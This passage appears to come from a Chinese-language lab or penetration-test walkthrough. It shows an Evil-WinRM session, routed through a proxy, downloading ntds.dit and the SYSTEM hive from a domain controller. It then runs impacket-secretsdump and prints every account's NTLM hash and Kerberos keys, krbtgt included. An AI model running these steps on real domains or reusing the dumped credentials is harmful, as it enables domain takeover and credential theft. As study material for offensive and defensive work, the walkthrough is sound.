 86.7%
 87.1%
 87.5%
 87.8%
 88.2%
 88.6%
 89.0%
 89.4%
 89.8%
 90.2%
 90.6%
 91.0%
 91.4%
 91.7%
 92.1%
 92.5%
 92.9%
 93.3%
 93.7%
 94.1%
 94.5%
 94.9%
 95.3%
 95.7%
 96.0%
 96.4%
 96.8%
 97.2%
 97.6%
 98.0%
 98.4%
 98.8%
 99.2%
 99.6%
100%
100%

------------------------------------------------------------------------------

                  总数        复制        跳过       不匹配        失败        其他
       目录:         1         0         1         0         0         0
       文件:         1         1         0         0         0         0
       字节:   16.00 m   16.00 m         0         0         0         0
       时间:   0:00:00   0:00:00                       0:00:00   0:00:00


       速度:           118,149,408 字节/秒。
       速度:             6,760.563 MB/分钟。
   已结束: 2025年4月25日 15:43:56

*Evil-WinRM* PS C:\Users\tianjing\Documents\yiyi> download system
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
                                        
Info: Downloading C:\Users\tianjing\Documents\yiyi\system to system
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\tianjing\Documents\yiyi> download ntds.dit
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
[proxychains] Strict chain  ...  45.207.197.131:8886  ...  172.22.14.11:5985  ...  OK
                                        
Info: Downloading C:\Users\tianjing\Documents\yiyi\ntds.dit to ntds.dit
Progress: 6% : |▒░░░░░░░░░░|

最后用download下来的ntds.dit和system本地进行解密

1	impacket-secretsdump -ntds ntds.dit -system system local

┌──(root㉿kali)-[/tmp]
└─# impacket-secretsdump -ntds ntds.dit -system system local 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x4d1852164a0b068f32110659820cd4bc
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 8cca939cb8a94a304d33209b41a99517
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:70c39b547b7d8adec35ad7c09fb1d277:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XR-DC$:1000:aad3b435b51404eeaad3b435b51404ee:d6207c59106bfcedad60cb7de1768b42:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4b2afb57dd0833ee9ed732ea89c263a3:::
XR-0923$:1103:aad3b435b51404eeaad3b435b51404ee:b486c9b11e2af380c736f0d618d9bc23:::
tianjing:1104:aad3b435b51404eeaad3b435b51404ee:c8252441ad9f475d629865fe86b3aecd:::
liyuying:1106:aad3b435b51404eeaad3b435b51404ee:4e77dc688f87c4ebbbe1da95931d25d1:::
wangyuying:1107:aad3b435b51404eeaad3b435b51404ee:f09d261da7841e97bc25e5a95833ee4a:::
yangguiying:1108:aad3b435b51404eeaad3b435b51404ee:93242254318fe496c9d03908c0ab7440:::
zhoumin:1109:aad3b435b51404eeaad3b435b51404ee:fad94b7c69cdbc4376fb17dc78cc858e:::
chenyun:1110:aad3b435b51404eeaad3b435b51404ee:8e41a10b056df5d0c53e8140d4790b21:::
chenmei:1111:aad3b435b51404eeaad3b435b51404ee:d53b17e5763bb9f028211044a32a9267:::
huangmin:1112:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
jiangcheng:1113:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
huanggang:1114:aad3b435b51404eeaad3b435b51404ee:9c75fa751d66813d7ed4caa6d2d9af38:::
machao:1115:aad3b435b51404eeaad3b435b51404ee:9a504875c8fc24ea22c3a27152ed3273:::
liguihua:1119:aad3b435b51404eeaad3b435b51404ee:88c540dbe639451a04a5183ea0e0af0d:::
wangfang:1120:aad3b435b51404eeaad3b435b51404ee:0bf4fdbc625a4435868eb71dbc8307b3:::
liguizhi:1122:aad3b435b51404eeaad3b435b51404ee:51c00743fa6f148926694c830112ae33:::
wangyulan:1123:aad3b435b51404eeaad3b435b51404ee:9b57eb71d89ba4003558cc451c3393ef:::
huachunmei:1126:aad3b435b51404eeaad3b435b51404ee:75fa801c8a5bedcb2b81c4f792ce1024:::
jiadongmei:1127:aad3b435b51404eeaad3b435b51404ee:6ac97d0534c99743bfa52ed5584e916b:::
liguilan:1128:aad3b435b51404eeaad3b435b51404ee:c337e57ca73c99e1eb1da443425da58b:::
yuxuecheng:1129:aad3b435b51404eeaad3b435b51404ee:cfc4835a206d618f1d7ea2bc22cc49ac:::
lixiuying:1130:aad3b435b51404eeaad3b435b51404ee:2e73b44dce942ffe682bb3b4052caa95:::
liguizhen:1134:aad3b435b51404eeaad3b435b51404ee:63d1d7be0b04f6b5b5336434a3d5a518:::
chenjianhua:1135:aad3b435b51404eeaad3b435b51404ee:5e121c3d4d259f35917c9c666c7c3650:::
yangjuan:1138:aad3b435b51404eeaad3b435b51404ee:68868390d1183fb671a371e0929b8a54:::
lidan:1139:aad3b435b51404eeaad3b435b51404ee:4dea8e760936a0d96f906edc4a470add:::
liyang:1140:aad3b435b51404eeaad3b435b51404ee:428aa70becfc16307febab419ecb313c:::
zhaojun:1141:aad3b435b51404eeaad3b435b51404ee:2f8101fa58b9337891ec96ce56b8b2f7:::
chenxin:1145:aad3b435b51404eeaad3b435b51404ee:e0eca1319b608886bc2102ba569a13f6:::
chenfei:1146:aad3b435b51404eeaad3b435b51404ee:dc1d2b7d3939d0002ba8292d1e1b20a4:::
chenhao:1148:aad3b435b51404eeaad3b435b51404ee:1145c8ce1774e134341b1f243eaca68b:::
lifei:1149:aad3b435b51404eeaad3b435b51404ee:3e08a9626cd85505b46166ae57e38ca1:::
zhangfang:1150:aad3b435b51404eeaad3b435b51404ee:010505bc625ab34f2b4e497861c51f13:::
zhangkun:1151:aad3b435b51404eeaad3b435b51404ee:814c056b97ff9cf9bbe4922c4ca32881:::
yanglei:1155:aad3b435b51404eeaad3b435b51404ee:055fd770c62e1b9582c1aeebcb04fc71:::
chenxia:1157:aad3b435b51404eeaad3b435b51404ee:c52d91b91f859c850087fa74e14a9069:::
zhangkai:1160:aad3b435b51404eeaad3b435b51404ee:40fee6e974e30258042a6b845acf41f4:::
liuyu:1161:aad3b435b51404eeaad3b435b51404ee:bafadbab49757fda93da68c7f9f787a7:::
chenming:1163:aad3b435b51404eeaad3b435b51404ee:75f769ecda05fbf6a6848f8398e9b120:::
mali:1164:aad3b435b51404eeaad3b435b51404ee:8a5e14c2a4876105e7c1370d36cfc7a1:::
chengang:1169:aad3b435b51404eeaad3b435b51404ee:8bd93219f6d7921e241415c508473482:::
huangwei:1171:aad3b435b51404eeaad3b435b51404ee:5b681f8a5961a08ad983c05ea976a65e:::
lixia:1174:aad3b435b51404eeaad3b435b51404ee:5fc366da322ac7c3098ab20bb56ffe11:::
xujing:1175:aad3b435b51404eeaad3b435b51404ee:3df64977422013367c25f57cd9d3b2c3:::
zhangjuan:1178:aad3b435b51404eeaad3b435b51404ee:dba8c7706c9c2fea332afe2b8e8a1bba:::
chenhui:1179:aad3b435b51404eeaad3b435b51404ee:78f95a95a9304cf06f1b0a733ac8eee7:::
liying:1181:aad3b435b51404eeaad3b435b51404ee:d3e572a3aa71a4cefe7a8ad65dc4e1ec:::
zhaoli:1182:aad3b435b51404eeaad3b435b51404ee:561b71d50c2614d91e6031a1e44ba3fe:::
zhoujing:1184:aad3b435b51404eeaad3b435b51404ee:1fefe6706ec68bb805361ce5a9944fbc:::
zhaoyong:1189:aad3b435b51404eeaad3b435b51404ee:27bd4f7d5403828b5ed310729119693a:::
wangyu:1192:aad3b435b51404eeaad3b435b51404ee:f1476afff3d4e3e4c97a0e18a88a651f:::
yangli:1193:aad3b435b51404eeaad3b435b51404ee:5d01864d2dc0eca800b7faf6aac91b38:::
yangliu:1196:aad3b435b51404eeaad3b435b51404ee:101fdcd11cd305f78495a8bcd31b02d9:::
wangying:1197:aad3b435b51404eeaad3b435b51404ee:0a8fbc5b333c1a52b4b8089fee9c274a:::
chenjie:1198:aad3b435b51404eeaad3b435b51404ee:fe343db5062c94af05a2c5b2bcfbf8ad:::
yangyong:1199:aad3b435b51404eeaad3b435b51404ee:e03de581dc8e75885672faa7e9f4d498:::
lixin:1201:aad3b435b51404eeaad3b435b51404ee:dd559fcf4523947742dbdc72f9e52e6b:::
zhanghui:1205:aad3b435b51404eeaad3b435b51404ee:ea31fe5bfe9fcbb74613ce13ac81225f:::
chenlin:1208:aad3b435b51404eeaad3b435b51404ee:b8cd9155c7c4e3f2fe535272566420cf:::
chenjuan:1209:aad3b435b51404eeaad3b435b51404ee:38f7a5a37bca7d68b17ad2eb922b44f3:::
chenchen:1215:aad3b435b51404eeaad3b435b51404ee:9e7295616a8faf501b5526f0eaeb5b0c:::
wangbing:1216:aad3b435b51404eeaad3b435b51404ee:d12641f47f63cb00cb5686ab0baa7113:::
chenling:1219:aad3b435b51404eeaad3b435b51404ee:f322cbf95eba279337538777e454abf1:::
yangmei:1220:aad3b435b51404eeaad3b435b51404ee:b50dd4e0fe64b40d91c33a97d4c66784:::
tiangui:1226:aad3b435b51404eeaad3b435b51404ee:8b30503a779d10de17744bb56ee15b8c:::
tianwen:1227:aad3b435b51404eeaad3b435b51404ee:667454046d29e985b63a7931f4b9219d:::
tianshengli:1228:aad3b435b51404eeaad3b435b51404ee:df0febe8871e463155401c3d896244fc:::
tianshi:1229:aad3b435b51404eeaad3b435b51404ee:63d1d7be0b04f6b5b5336434a3d5a518:::
tianlong:1230:aad3b435b51404eeaad3b435b51404ee:5e121c3d4d259f35917c9c666c7c3650:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:afdaee99d584caec50bfce43fb4f524e80017d7d04fdd435849a9e8a037ba399
Administrator:aes128-cts-hmac-sha1-96:17cf30f985414dfc95092429bf74fac7
Administrator:des-cbc-md5:79a1466708cd6838
XR-DC$:aes256-cts-hmac-sha1-96:e47d07104906f03ddc0ea7890d7611e18d4af2afbed94183ad0935f35056ea3e
XR-DC$:aes128-cts-hmac-sha1-96:e0a33ecf1107f530f7e4f62c243a05ac
XR-DC$:des-cbc-md5:32a894374667cd19
krbtgt:aes256-cts-hmac-sha1-96:b2f2e630f3c12c2cc2779624a11a1406c792c8f31d145246e657b230ff9f0f09
krbtgt:aes128-cts-hmac-sha1-96:5f2c868accc1f40c80fdf7094494faf4
krbtgt:des-cbc-md5:673b2937e3cd7cab
XR-0923$:aes256-cts-hmac-sha1-96:59f1d8f27a11ead59f746935f8db45576ef5e1d19ab56442f66381e3bb79c8df
XR-0923$:aes128-cts-hmac-sha1-96:d23730d21e4379f66ef2a70aefbbc4bb
XR-0923$:des-cbc-md5:c492ecfde00ef286
tianjing:aes256-cts-hmac-sha1-96:0d2a06ad0f07f0571bb99c1fae170bde9dbb57b8c364a0f5c75370dde8b449af
tianjing:aes128-cts-hmac-sha1-96:e936ddfdaab20e8445c2e182e14cd422
tianjing:des-cbc-md5:15bf5d5de52a6be3
liyuying:aes256-cts-hmac-sha1-96:488901e33ba91b2b58d927797a5ec7f8bede179e6f3b7fba62aac4b9936427c9
liyuying:aes128-cts-hmac-sha1-96:5cbb47c3d5766dc4d33c613ab6f9a45f
liyuying:des-cbc-md5:027504a7a820ba07
wangyuying:aes256-cts-hmac-sha1-96:ed3bd47fce79ad0170f48646647764054b670720e4ad31328e5f50dc191aef2d
wangyuying:aes128-cts-hmac-sha1-96:0d66d8bfb7de1aaad057270b923edf46
wangyuying:des-cbc-md5:79918564ab61fe43
yangguiying:aes256-cts-hmac-sha1-96:8b06648fe9d6e47d8df4c4a3407b9bca7d7ae8b7a355d35788e483e24b5d5329
yangguiying:aes128-cts-hmac-sha1-96:65e2c07527272134938a1754e6a47740
yangguiying:des-cbc-md5:d532798061dad50d
zhoumin:aes256-cts-hmac-sha1-96:46fab8083c4f48489b21b5da3e2fc922ef1f66cfbbc78829b2fc477e4723783d
zhoumin:aes128-cts-hmac-sha1-96:1bff68920b27915b3f1e917ad981f854
zhoumin:des-cbc-md5:9dd67c40eff13de3
chenyun:aes256-cts-hmac-sha1-96:a56040ca8fb3770f172e4d17598afe76c45e5c400bfe8be77aba7b47655fd441
chenyun:aes128-cts-hmac-sha1-96:b74c17427ac4f3a8825eb0e1c861f59c
chenyun:des-cbc-md5:706e205864a1fe64
chenmei:aes256-cts-hmac-sha1-96:4cd6ffc87bbfccc5310e03680e5bafabca1cb658dececb87642e13dcbd1a7bb1
chenmei:aes128-cts-hmac-sha1-96:6afadb7a5f030a0181e340d94cb2a76a
chenmei:des-cbc-md5:70fbabc40b7a29ef
huangmin:aes256-cts-hmac-sha1-96:3fbff1b76fbe10a02085ff0a7bbd3e7c0e153078a8afe1895b0e10d342f33a28
huangmin:aes128-cts-hmac-sha1-96:2cfb104d7aaa245c6730fa57f38899f0
huangmin:des-cbc-md5:970df24ce354fe01
jiangcheng:aes256-cts-hmac-sha1-96:b10c07048384977f2470005b67dfa9d5e7a17de0fb04d53b49a3e0fb413d0215
jiangcheng:aes128-cts-hmac-sha1-96:663b9662442e3c99eb4c71f50c83bbf1
jiangcheng:des-cbc-md5:730e89e3c2835d2a
huanggang:aes256-cts-hmac-sha1-96:9976b9d8467cadf35251c9c95d860455ebf9297ba518e7fc6794861e9d28d99c
huanggang:aes128-cts-hmac-sha1-96:91039de3cbdeee790ecaac5067d47566
huanggang:des-cbc-md5:86a17adf6bad9b8f
machao:aes256-cts-hmac-sha1-96:850f91e3ffd9d79d803a3a23e28a5308e471d954a6018bffbaf7a44c680e11d0
machao:aes128-cts-hmac-sha1-96:edf47b1011a703e69df2e35b6a2201f7
machao:des-cbc-md5:b50dd0ae4fb52619
liguihua:aes256-cts-hmac-sha1-96:bcb1317ad7701a68c8d5f1f5d8b66522b4aa2b7406cb6e401d8d97a8d75979d8
liguihua:aes128-cts-hmac-sha1-96:2c6b6bf4e88d5b3872dbcb390372bc3d
liguihua:des-cbc-md5:68dc9e8591298c2c
wangfang:aes256-cts-hmac-sha1-96:aa8e2a28614728b293c3a3dc124942228b5f75c4ff006f57bfe2edbcd9b6c409
wangfang:aes128-cts-hmac-sha1-96:24e9e3c145dea8399bd42466105c1298
wangfang:des-cbc-md5:4fd32904c2cdfbad
liguizhi:aes256-cts-hmac-sha1-96:9e8e1024cb004343e5988ed4b5ebf9530bd2373ec02569f25992a205c9209a11
liguizhi:aes128-cts-hmac-sha1-96:354350b841cb28956f4d004645c2ee83
liguizhi:des-cbc-md5:daa22a027c3e205e
wangyulan:aes256-cts-hmac-sha1-96:0d4a8d53bea31df593d42e4687e79635adf1260d2a0d71b05bb2e04466d01e6d
wangyulan:aes128-cts-hmac-sha1-96:bc222459b9e2ab8b43c18dbfff6973a7
wangyulan:des-cbc-md5:898a495258f264bf
huachunmei:aes256-cts-hmac-sha1-96:1211b996ab19e3e795177d07d01a8c7f19e8018ddd80aafaa468f232e5a698e3
huachunmei:aes128-cts-hmac-sha1-96:125cccce2e74f5d74ec510b6a350e3f1
huachunmei:des-cbc-md5:86e92a15807a4c79
jiadongmei:aes256-cts-hmac-sha1-96:ffff95cfb208f879f9b2068a0c8b08cdd60639e6b9f703ceec8a5b0c2ccc4334
jiadongmei:aes128-cts-hmac-sha1-96:d8d36b6ab86f147c82c56d7d65663617
jiadongmei:des-cbc-md5:fbfd57619bb9fdf7
liguilan:aes256-cts-hmac-sha1-96:7d32d8c89be54ab71d4e7639e978ef785d45d4fa4fb24afad21692198610ea05
liguilan:aes128-cts-hmac-sha1-96:fa8ac7ca3813c7731b1f2fc9253a0cb9
liguilan:des-cbc-md5:89b03efb86b9df49
yuxuecheng:aes256-cts-hmac-sha1-96:433edf2a97d3157630073e2b08a65c27e826df63440f4d0721857f7d3c74969a
yuxuecheng:aes128-cts-hmac-sha1-96:5e69c8750664229d1ed4a2c309f1f445
yuxuecheng:des-cbc-md5:d57502da7cfdc715
lixiuying:aes256-cts-hmac-sha1-96:8dc409b74c936f88ff977d5c7c17b5923e7c9d2129181b332a372fbf851ae6b6
lixiuying:aes128-cts-hmac-sha1-96:7731bc096f07aa3fc59fb79334f84a3c
lixiuying:des-cbc-md5:f4efd652bffd38c2
liguizhen:aes256-cts-hmac-sha1-96:69e5444825707d32c47086a0960addf5fe852c615aa1d33068fe767e2d586db7
liguizhen:aes128-cts-hmac-sha1-96:acbbd817ea86423eb2f057a099539a01
liguizhen:des-cbc-md5:2a67ceae91ae62ae
chenjianhua:aes256-cts-hmac-sha1-96:f0924fc23af017ce6564b3cc1cd9fabd05fe5b5d8be129be5df65133943f0470
chenjianhua:aes128-cts-hmac-sha1-96:d1c0724b5498230ed579d769676cde56
chenjianhua:des-cbc-md5:b3d68ad93e6151fe
yangjuan:aes256-cts-hmac-sha1-96:43d37ef5df5d3330b632b12e2829fc447ab0516ea220b6a9856bed989457086f
yangjuan:aes128-cts-hmac-sha1-96:2005c468b32775081cc37652cb96ecda
yangjuan:des-cbc-md5:940e98e3510d0d1f
lidan:aes256-cts-hmac-sha1-96:5573faaba91091eca180b3bd85af973dea9376b8c61ac3f95927e4a9d42bb64b
lidan:aes128-cts-hmac-sha1-96:6ca7b107e36c69573a2145ac18a32aab
lidan:des-cbc-md5:c1c740bca81a01c4
liyang:aes256-cts-hmac-sha1-96:368c633291007799691c311cd51f075b23daf7404fdaf846c4ef578fd65af2ff
liyang:aes128-cts-hmac-sha1-96:6d254393e532337391ed5bf0f28bd8b0
liyang:des-cbc-md5:baa13b32e3ae0e4f
zhaojun:aes256-cts-hmac-sha1-96:0d64e2fd344b63bbfddf3bd7a59090ccf5164e15178b2016b55a1e750d312524
zhaojun:aes128-cts-hmac-sha1-96:545fdb088d59961732860089791831ab
zhaojun:des-cbc-md5:2cad52ab57b69185
chenxin:aes256-cts-hmac-sha1-96:632e0ad6d26bd68e155f5f41c4221706f54f8e05998932626bccb795fdc7c51d
chenxin:aes128-cts-hmac-sha1-96:27bb7eabfc84cfe3ef31c7a9ac82d5f2
chenxin:des-cbc-md5:f12f6b077c9e5286
chenfei:aes256-cts-hmac-sha1-96:8653f8a0c80d9b00fc7de8954bf7412354cc68ec1646359edca95d25ad0a88d1
chenfei:aes128-cts-hmac-sha1-96:d50fc4b371bb48d6c514c99a9fe22a12
chenfei:des-cbc-md5:45ce29800e0bec38
chenhao:aes256-cts-hmac-sha1-96:244b7e6dcf52043cbcef620af6e2de7473626b28ec661ec76afd385ac18de271
chenhao:aes128-cts-hmac-sha1-96:adc33c162098184ac781947c4cc52424
chenhao:des-cbc-md5:8945e9feef9bb95e
lifei:aes256-cts-hmac-sha1-96:ae7363ebdeba1e7304f0f8cbee97fc11b65989d90669a21ad9534ffa99307609
lifei:aes128-cts-hmac-sha1-96:3f8d5b322c3ab7bc868bb0bdcc1941d5
lifei:des-cbc-md5:9843d568238f2ca4
zhangfang:aes256-cts-hmac-sha1-96:13149438681fe298dbdc3195933b0d12b520fdc19beed12ccdd759b2876ec473
zhangfang:aes128-cts-hmac-sha1-96:87c2f2db0c8f52c38eb716322233aaa3
zhangfang:des-cbc-md5:31e39e23df375efd
zhangkun:aes256-cts-hmac-sha1-96:6a92de23b62a7a981372f25862cb15f4754c30bf5621f220c9ea0b614ef5f6e3
zhangkun:aes128-cts-hmac-sha1-96:a6de080a2379a63d32a83b68664a9d1e
zhangkun:des-cbc-md5:2f2964df6ea8a4fb
yanglei:aes256-cts-hmac-sha1-96:b2e73d98dd93709436341867ae798817666464bd845c78aaa8ae1a8ec9dd384c
yanglei:aes128-cts-hmac-sha1-96:4e36c64295765d639cf726c4d288a1c3
yanglei:des-cbc-md5:c8642316cdf2c4f7
chenxia:aes256-cts-hmac-sha1-96:c808029491533d77785b1f8524e793a258a360bb32d18fc2fb092bf2b6e5e4ae
chenxia:aes128-cts-hmac-sha1-96:58cb554bd6965ce5ede4f162b71f3114
chenxia:des-cbc-md5:7057133d688938e6
zhangkai:aes256-cts-hmac-sha1-96:266d5fac40d3d0eb98756a8f1d3989f73deb7b828814ee444940dd035ef8b469
zhangkai:aes128-cts-hmac-sha1-96:994ed7ddbc91fb11daa4871c050e7479
zhangkai:des-cbc-md5:9d512919518a1c76
liuyu:aes256-cts-hmac-sha1-96:c8f33c45558655ac14720066270be7c7c6b39f7e51e23c920e3dc002a560fb36
liuyu:aes128-cts-hmac-sha1-96:d3ed22d7212aae06ecd66d3329d7436b
liuyu:des-cbc-md5:7002bac25b79494a
chenming:aes256-cts-hmac-sha1-96:a105587d48671d737f2b157387801fa5cdc8ae6f71d7a001d2a5c8aabc527a5e
chenming:aes128-cts-hmac-sha1-96:485a8993fd4158e5cbe15f7c9d0b5ba0
chenming:des-cbc-md5:d3793db004efe589
mali:aes256-cts-hmac-sha1-96:b9aa8e0a378585ca77bdcc237fdec9772f8926ade0f2484ec57c5a3ad77be4ad
mali:aes128-cts-hmac-sha1-96:96c881437be8422c98876f77bcd17f8f
mali:des-cbc-md5:6783da3145a80870
chengang:aes256-cts-hmac-sha1-96:189cef2f3df1b20e67a47bbc52e47fe5a3fa135b7a179921db75a23add12491e
chengang:aes128-cts-hmac-sha1-96:8989abbab9dd4d6c592f44843d144ed1
chengang:des-cbc-md5:8c7a86dc70d93e83
huangwei:aes256-cts-hmac-sha1-96:47409c2356a5b4b35f47a2c094129806687dbf5d371fecaabd306d0d6a6a7a7c
huangwei:aes128-cts-hmac-sha1-96:18a6b14982eaf1632550dca3553e786c
huangwei:des-cbc-md5:7a8abf32ae678652
lixia:aes256-cts-hmac-sha1-96:71990bae8e42d7afb988fd8c085192b62117b929bc632514b26067c81a408071
lixia:aes128-cts-hmac-sha1-96:67e54c4fd23d21f466c2d221f059bfcb
lixia:des-cbc-md5:263449465edc946e
xujing:aes256-cts-hmac-sha1-96:02e1509264194ced75b98f79967461e7780df97195f60474f4200c473588ed57
xujing:aes128-cts-hmac-sha1-96:30e97e50335033cafa9778e493567b24
xujing:des-cbc-md5:6dd56780f4579dc7
zhangjuan:aes256-cts-hmac-sha1-96:a469ff2fd19f472f1dfe1e301c44e44c8ceae2a9df065b29ee929f85dbaa8c5d
zhangjuan:aes128-cts-hmac-sha1-96:6c0bad8269b7460b9255f1ef26f9cb64
zhangjuan:des-cbc-md5:e962498fb90e757a
chenhui:aes256-cts-hmac-sha1-96:8456a5c089d601092a3eb142d1a8b6fa391e6fa707985da0f5a6d9512aa2f0a5
chenhui:aes128-cts-hmac-sha1-96:85ae6b41314586a7aef3dbcd443400c0
chenhui:des-cbc-md5:940e839464d06d58
liying:aes256-cts-hmac-sha1-96:4269ed8cd2c11584b0b67188a36b97fcc4a2e39bc4ba1f0ae3ab45329da2cd6a
liying:aes128-cts-hmac-sha1-96:778adcb89c1b1b82409623deb5af003b
liying:des-cbc-md5:a743a743c11f10ba
zhaoli:aes256-cts-hmac-sha1-96:dd9304d96d8cd2bbabada50ea482f4206ceba309590727771a8d57ef9a06a236
zhaoli:aes128-cts-hmac-sha1-96:d11d14a4ed03bfdb42ecf3cbd565b71b
zhaoli:des-cbc-md5:58ce9179fee6f1ad
zhoujing:aes256-cts-hmac-sha1-96:bf1237d53687578f0097bf7d92da3791bb59510d5bbd5fba3a34b612393042d3
zhoujing:aes128-cts-hmac-sha1-96:ddebd80f19a091b0c5db58bbd5de7d09
zhoujing:des-cbc-md5:9edff1017c023e7c
zhaoyong:aes256-cts-hmac-sha1-96:bc9c259cb28f85122cd973471c6c673bde03b9927a2058fbd112e01bd9509e39
zhaoyong:aes128-cts-hmac-sha1-96:b3be655b130bfdc1a5ae611544a7d74e
zhaoyong:des-cbc-md5:daa19192a78fc8fd
wangyu:aes256-cts-hmac-sha1-96:2e6969f11503f5dc619603395a56d541711ef621fe966a6ae9564e814d6db35d
wangyu:aes128-cts-hmac-sha1-96:4d2c21bcef8f3f234c23c9cfdb8d36cb
wangyu:des-cbc-md5:5e5dbc57ec0d6892
yangli:aes256-cts-hmac-sha1-96:fd2c88aa981430b7b57087878426f9aa33685bfb63889e512a7523e9e7b7e5ad
yangli:aes128-cts-hmac-sha1-96:b1d07abe126fc688e5fd5d0954a0f5a5
yangli:des-cbc-md5:8cc85eb55213df80
yangliu:aes256-cts-hmac-sha1-96:502f8f06819d4ca123bf0df2369bc01e39b10beaae9736bb89abd84aed191fda
yangliu:aes128-cts-hmac-sha1-96:b85b63efbafc11c81c903fbed1dacfe1
yangliu:des-cbc-md5:d0e6ec61d398c7a7
wangying:aes256-cts-hmac-sha1-96:21e7193624de64b091a50e40d237b7f7b95d98906c93361e668e1549a09964a6
wangying:aes128-cts-hmac-sha1-96:34559e58805b50fe63bd5b961b5e2781
wangying:des-cbc-md5:c198fe298023adb3
chenjie:aes256-cts-hmac-sha1-96:97f92bb027a23aa3e6c2f6f1e3be29b55ddae5894eec1b7bb64a2f404178f82f
chenjie:aes128-cts-hmac-sha1-96:246586d92c3a2112abdb78f6be6426fb
chenjie:des-cbc-md5:4ae9757f4346ae6e
yangyong:aes256-cts-hmac-sha1-96:a10d5f57e67555b38c94130eb639bfc1f3b5677eac62092ba23617fa15db0920
yangyong:aes128-cts-hmac-sha1-96:85bc63a86588f89b3d2130fde972814a
yangyong:des-cbc-md5:649140daa754e034
lixin:aes256-cts-hmac-sha1-96:5193d0c97992d131cf3e1daf9663d21c41b59c24df5f9800989e75d6cec2c026
lixin:aes128-cts-hmac-sha1-96:08bb58e1e3c1768a3938c1dde3fabcfb
lixin:des-cbc-md5:dc7a768945a8856d
zhanghui:aes256-cts-hmac-sha1-96:28c0a77a1889fbfbe41516244c96fb374558f3ed3edf9432d131470513d1e166
zhanghui:aes128-cts-hmac-sha1-96:7c928a8e82893e033fda12414479f5e9
zhanghui:des-cbc-md5:10baad3e9d708397
chenlin:aes256-cts-hmac-sha1-96:0501a62dd2b81829e06b4d02104541280730a1e6b0016f7fea9f1d7607342eb9
chenlin:aes128-cts-hmac-sha1-96:8666d30a719f44d7982835ae67af6936
chenlin:des-cbc-md5:d30ea8c180549d2a
chenjuan:aes256-cts-hmac-sha1-96:04cf01b384731d37fd48560e80f9d6f165c975f4023397c70e57483fccda3c80
chenjuan:aes128-cts-hmac-sha1-96:fbdee824097b2bb693c11f4c52134ca5
chenjuan:des-cbc-md5:fbb3b35ed0d96797
chenchen:aes256-cts-hmac-sha1-96:16250fd1a2d3ae95b67e57a8acc6f435faec821b61cedd21bc27c8c7ede16196
chenchen:aes128-cts-hmac-sha1-96:af6d75b3fef90e2c6e61e293de29bc84
chenchen:des-cbc-md5:f78319b9a2da5445
wangbing:aes256-cts-hmac-sha1-96:491d52f25c8ab1285b311334aa18ac3a49c4caf2c49364f5d20ef0cf3267b752
wangbing:aes128-cts-hmac-sha1-96:944ef5275279bc9ff350912313680a3e
wangbing:des-cbc-md5:c86273856dea3e92
chenling:aes256-cts-hmac-sha1-96:8ca2fa002a4fac085e9843e1fee471fbf216352c15c160eaa9a8e248359ba08f
chenling:aes128-cts-hmac-sha1-96:1f9dcffdd9cb633d7473c8ad9dbc0979
chenling:des-cbc-md5:57a7ead0f204949b
yangmei:aes256-cts-hmac-sha1-96:7fe6a96f3ea8521ac38c8d9a6afbb63432d09837d3edb65e328b5b42524ba4d3
yangmei:aes128-cts-hmac-sha1-96:5784edf9af99c8f4b11d477ac467e581
yangmei:des-cbc-md5:6d40859286b6c285
tiangui:aes256-cts-hmac-sha1-96:ea973d77cb1e7553eebf74f252f6e65d3ded442a2e903882130a891b0857ae5c
tiangui:aes128-cts-hmac-sha1-96:4b0540f9f84c834834b7630ba572b161
tiangui:des-cbc-md5:57bf1c150bf4163b
tianwen:aes256-cts-hmac-sha1-96:0d50bde0354833c30284bb4e5105fe6efde9a6d394492c17ebad628abda6a120
tianwen:aes128-cts-hmac-sha1-96:623189263738cd93d353cc69ed901587
tianwen:des-cbc-md5:e0f18f37293b4a46
tianshengli:aes256-cts-hmac-sha1-96:86dd2340322e692dc84a55b58a071193c61aa9f42ccb5313b1e9faea32901a17
tianshengli:aes128-cts-hmac-sha1-96:a48d66d1a413fbac7a84dd8b36f0018d
tianshengli:des-cbc-md5:3b5b76839b15b691
tianshi:aes256-cts-hmac-sha1-96:42a569ceee74f3ffeed1ec3660e38240154ec993d3dced11210ed9fd4c2ffcd3
tianshi:aes128-cts-hmac-sha1-96:38cd8b41da38afbade0a00993f4d7bbb
tianshi:des-cbc-md5:49d0c4d93861732f
tianlong:aes256-cts-hmac-sha1-96:d1ce4031b5d242c4e6e24831e69dd78147eb7ade76e2cda79459ee10e77e5477
tianlong:aes128-cts-hmac-sha1-96:860569a4d25b4649055da07b96d2e41f
tianlong:des-cbc-md5:e9464389858c0ba1
[*] Cleaning up...